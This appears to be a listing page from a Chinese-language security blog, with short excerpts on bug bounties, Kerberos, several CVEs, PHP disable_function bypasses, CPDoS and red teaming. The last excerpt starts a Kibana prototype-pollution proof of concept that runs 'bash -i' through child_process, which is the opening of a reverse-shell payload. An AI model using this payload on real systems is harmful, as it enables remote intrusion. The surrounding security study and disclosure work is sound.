波波的寂寞世界【今日觀點】 Bug Bounty Hunter & 企業面對Bug bounty Program的心態
近年來,許多的組織/企業開始推動並加入Bug Bounty Program(漏洞回報獎勵計畫),在企業的規範條件下,讓人人都可以參與,幫助企業挖掘漏洞,並通報給廠商,而廠商會視漏洞的嚴重性給予適當的獎勵回饋。 企業為了讓產品及本身的服務更安...
最新發布 第2頁
Windows內網協議學習Kerberos篇之ASREQ& ASREP
熟悉內網滲透的應該都對IPC,Golden ticket,Silver ticket ,ntlm relay,Ptt,Ptk 這些詞彙再熟悉不夠了,對其利用工具也瞭如指掌,但是有些人對裡面使用的原理還不太瞭解,知其然不知其所以然,本系列文章...
Anti-virus Exploitation: Local Privilege Escalation in K7 Security (CVE-2019-16897)
作者記錄了些關於發現K7 Security的漏洞過程,透過修改DLL最後達到System提權。 原文連結: https://0x00sec.org/t/anti-virus-exploitation-local-privilege-esca...
談談資訊安全入門這事
不要怕困難,學習是一個快樂的過程,如果不快樂也不能把學習變成快樂,放棄吧資安不適合你。 不要怕麻煩,堅持不斷學習,克服一個困難總會有下一個困難等著你的。 原文連結: https://mp.weixin.qq.com/s/34hHV_uDap...
CVE-2019-18622 SQL Injection in phpMyAdmin
A vulnerability was reported where a specially crafted database name can be used to trigger an SQL injection attack thro...
淺談 RASP
RASP是Runtime application self-protection的縮寫,中文翻譯為應用程式執行時防護,其與WAF等傳統安全防護措施的主要區別於其防護層級更加底層——在功能呼叫前或呼叫時能獲取訪問到當前方法的參數等資訊,根據這...
CPDoS: Cache Poisoned Denial of Service
What is CPDoS? Cache-Poisoned Denial-of-Service (CPDoS) is a new class of web cache poisoning attacks aimed at disabling...
PHP繞過disable_function 總結與實踐
原文連結: https://blog.szfszf.top/tech/php%E7%BB%95%E8%BF%87disable_function-%E6%80%BB%E7%BB%93%E4%B8%8E%E5%AE%9E%E8%B7%B5/ ...
PHP Remote Code Execution 0-Day Discovered in Real World CTF Exercise
This is an exploit for a bug in php-fpm (CVE-2019-11043). In certain nginx + php-fpm configurations, the bug is possible...
基於MITRE ATT&CK的Red Teaming行動實踐
本文將探討如何利用ATT&CK站在攻擊者視角來組織和實踐Red Teaming行動,更加有針對性的模擬真實世界的攻擊者以達到“實戰養兵”的目的。 原文連結:https://mp.weixin.qq.com/s/u1cPkGegyRp...
Prototype Pollution in Kibana
POC: kibana < 6.6.0 .es(*).props(label.__proto__.env.AAAA='require("child_process").exec("bash -i...
